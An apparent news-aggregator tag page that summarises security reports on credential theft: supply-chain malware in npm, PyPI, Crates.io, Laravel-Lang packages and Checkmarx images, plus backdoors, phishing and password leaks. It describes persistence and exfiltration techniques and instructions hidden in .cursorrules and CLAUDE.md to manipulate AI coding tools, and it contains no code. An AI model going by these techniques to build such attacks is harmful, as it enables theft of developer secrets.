Tag

Credential Theft

All articles tagged with #credential theft

security1 day ago•3 min saved

TrapDoor Strikes npm, PyPI, and Crates.io with Cross-Ecosystem Credential-Stealing Malware

A coordinated TrapDoor campaign targets npm, PyPI, and Crates.io, distributing 34 malicious packages across hundreds of versions to steal developer secrets, crypto wallets, SSH keys, cloud credentials, and environment data. npm payloads run trap-core.js to harvest credentials and establish persistence via cron, systemd, Git hooks, and SSH lateral movement; Rust crates search keystores and exfiltrate data to GitHub Gists; Python packages auto-execute on import and fetch a remote JavaScript payload executed via node -e. The attack also hides instructions in .cursorrules and CLAUDE.md to trick AI tools through PRs, signaling an evolution of developer-workflow attacks across multiple ecosystems.

via The Hacker News|

#cratesio #credential-theft #npm

cybersecurity2 days ago•5 min saved

Massive Laravel-Lang Breach Sparks Cross-Platform Credential Theft

Security researchers warn of a broad compromise of Laravel-Lang PHP packages (laravel-lang/lang, http-statuses, attributes, actions) that injected a malicious src/helpers.php into autoloaded vendor files. The attack involved rapid tagging of 700+ package versions in May 2026, suggesting access to the Laravel Lang release infrastructure. The embedded dropper runs on startup and delivers a ~5,900-line PHP credential stealer that exfiltrates cloud tokens, service credentials, browser data, VPN configs and more to flipboxstudio.info, encrypts results with AES-256, and self-deletes. Windows uses a Visual Basic Script launcher; Linux/macOS execute the payload via shell. Remediation includes auditing dependencies, rotating credentials, upgrading to clean versions, and monitoring for indicators of compromise.

via The Hacker News|

#credential-theft #cybersecurity #laravel-lang

security1 month ago•4 min saved

Checkmarx Supply-Chain Breach: Poisoned KICS Docker Images and Malicious VS Code Extensions

Security researchers warn of a Checkmarx supply-chain breach: attackers overwrote tags in the official checkmarx/kics Docker Hub (notably v2.1.20, alpine; adding v2.1.21) with a compromised KICS binary that exfiltrates data and can encrypt and send scan reports to an external endpoint; separately, Checkmarx VS Code extensions (cx-dev-assist and ast-results, versions 1.17.0/1.19.0) load a remote mcpAddon.js via a hard-coded GitHub URL, enabling credential theft and propagation as attackers injected a backdated commit to introduce a large payload; the attack uses stolen tokens to create public repos, GitHub Actions workflows, and to exfiltrate GitHub, AWS/Azure/GCP credentials, npm configs, SSH keys, and environment variables to public repos and to an endpoint controlled by the attackers; the operation also spreads through the npm ecosystem by republishing ~250 compromised packages; 51 repos reference Checkmarx Configuration Storage in READMEs; TeamPCP is suspected; mitigation includes removing affected artifacts, rotating credentials, auditing GitHub workflows, reviewing npm packages, and monitoring access logs.

via The Hacker News|

#credential-theft #docker #github-actions

technology3 months ago•25 min saved

Canva Counted Among ~100 Victims in Shiny Hunters Credential theft

The Register reports that Canva is among about 100 targets affected by the Shiny Hunters credential-theft operation, with the piece listing numerous advertising-tech vendors and the types of data and cookies involved. The broad scope underscores a sizable attack surface across the ad-tech ecosystem and highlights the need for strong credential hygiene and monitoring for suspicious activity across partnered platforms.

via theregister.com|

#adtech #canva #credential-theft

cybersecurity4 months ago•4 min saved

Malicious npm Packages Exploit Phishing to Steal Login Credentials

Cybersecurity researchers uncovered a targeted spear-phishing campaign using 27 malicious npm packages to host browser-based phishing lures mimicking document-sharing portals and Microsoft sign-in pages, primarily targeting organizations in critical infrastructure sectors across multiple countries. The campaign leverages package CDNs for resilient hosting, employs anti-analysis techniques, and hard-codes specific email addresses, with the goal of stealing login credentials. The activity highlights ongoing threats in the software supply chain, emphasizing the need for stringent dependency verification and monitoring.

via The Hacker News|

#credential-theft #cyberattack #cybersecurity

cybersecurity6 months ago•2 min saved

Security Threats Emerge from Malicious and AI-Generated Extensions on Developer Platforms

Cybersecurity researchers have identified three malicious VS Code extensions linked to the GlassWorm campaign, which uses invisible Unicode characters to hide malware, steal credentials, and spread in a worm-like fashion. Despite removal efforts, the threat has resurfaced, leveraging blockchain-based command-and-control infrastructure to maintain resilience. The attack has affected victims worldwide, including a major Middle Eastern government, and has expanded to target GitHub repositories.

via The Hacker News|

#credential-theft #cyberattack #cybersecurity

technology9 months ago•3 min saved

Google Enhances Security Measures to Combat Account Hacks and Cyberattacks

Google reports a significant increase in account hacking attacks, primarily through phishing and credential theft, with an 84% rise last year and ongoing threats in 2025. The company provides a step-by-step guide for users to recover their accounts, emphasizing the importance of using trusted devices and following security protocols. Experts highlight that attackers often use legitimate email accounts for credential harvesting, posing risks beyond Google users. Users are advised to stay vigilant and follow recommended security practices to protect their accounts.

via Forbes|

#account-hacking #credential-theft #google

cybersecurity9 months ago•1 min saved

New 'Plague' Linux Backdoor Evades Detection to Steal Credentials

Cybersecurity researchers have discovered a new undetected Linux backdoor called Plague, which exploits PAM modules to silently bypass authentication, maintain persistent SSH access, and evade detection through advanced obfuscation and environment tampering, posing a significant threat to Linux systems.

via The Hacker News|

#backdoor #credential-theft #cybersecurity

technology11 months ago•2 min saved

Massive 16 Billion Passwords Leak Sparks Crypto Security Concerns

A massive leak of over 16 billion passwords from major online services like Apple, Google, and Facebook raises significant security concerns, especially for crypto users, as it could lead to increased account takeovers and thefts. The breach highlights vulnerabilities such as password reuse and weak authentication, urging users to update passwords, enable 2FA, and secure recovery data.

via Cointelegraph|

#credential-theft #crypto-security #cybersecurity

technology1 year ago•4 min saved

Massive Data Breach Exposes 184 Million Passwords, Urging Immediate Security Measures

Pakistan's National Cyber Emergency Response Team has urged citizens to change all social media passwords following a massive global data leak exposing 184 million account credentials, which poses risks like account takeovers, identity theft, and targeted scams. Immediate action, including creating strong, unique passwords and enabling multi-factor authentication, is recommended to mitigate potential damages.

via Geo.tv|

#credential-theft #cybersecurity #data-breach

cybersecurity1 year ago•3 min saved

Cyber Threat Alert: Phishing Attacks Exploit Microsoft Visio Files

Security researchers from Perception Point have identified a new two-step phishing attack method using Microsoft Visio (.vsdx) files to evade detection and steal credentials. These attacks exploit the familiarity of Visio files in workplaces, embedding malicious URLs that lead victims to fake Microsoft 365 login pages. The attack involves instructing users to hold down the Ctrl key to access these URLs, bypassing automated security systems. Enhanced email security and two-factor authentication are recommended to mitigate these threats.

via Forbes|

#credential-theft #cyberattacks #cybersecurity

cloud-security-data-protection2 years ago•2 min saved

Snowflake and Ticketmaster Breaches: Credential Theft and Data Leaks Under Scrutiny

Snowflake has warned that a targeted credential theft campaign is affecting a limited number of its cloud customers, with threat actors using stolen credentials obtained through infostealing malware to access accounts with single-factor authentication. The company, along with CrowdStrike and Mandiant, has found no evidence of a platform vulnerability or compromised Snowflake personnel credentials. Organizations are urged to enable multi-factor authentication and restrict network traffic to trusted locations. The U.S. CISA and Australia's ACSC have issued similar advisories following the spike in malicious activity.

via The Hacker News|

#cloud-customers #cloud-security-data-protection #credential-theft

cybersecurity2 years ago•1 min saved

"Cloud Security Alert: Kinsing Actors Exploit Linux Flaw for Breaching Environments"

Threat actors associated with Kinsing are exploiting the recently disclosed Linux privilege escalation flaw, Looney Tunables, in a new experimental campaign aimed at breaching cloud environments. The attackers are also extracting credentials from the Cloud Service Provider (CSP), marking the first documented instance of active exploitation of Looney Tunables. Kinsing actors have a history of quickly adapting their attack chains to exploit newly disclosed security flaws, and in this case, they are using a critical remote code execution vulnerability in PHPUnit to gain initial access. The ultimate goal of the attack is to extract CSP credentials for future attacks, indicating a potential broadening and intensification of the Kinsing operation in cloud-native environments.

via The Hacker News|

#cloud-environments #credential-theft #cybersecurity